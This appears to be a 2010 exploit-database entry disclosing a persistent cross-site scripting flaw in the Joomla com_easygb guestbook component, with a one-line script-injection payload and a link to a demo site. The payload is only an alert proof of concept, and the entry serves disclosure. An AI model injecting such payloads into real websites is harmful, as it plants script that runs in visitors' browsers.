id: 9633
date: 03/15/2010
title: Joomla com_easygb presistent XSS Vulnerability
author: kazuya
cves: 

==============================================
Joomla com_easygb presistent XSS Vulnerability
==============================================

# Joomla com_easygb presistent XSS Vulnerability
# Author: kazuya
# Contact: kazuy0r@gmail.com
# Greetz to back2hack

# Vulnerability
# Code: "><script>alert("meoww")</script>
# Demo: http://demo.joomla-addons.org/index.php?option=com_easygb&Itemid=6 



#  0day.today [2023-03-22]  #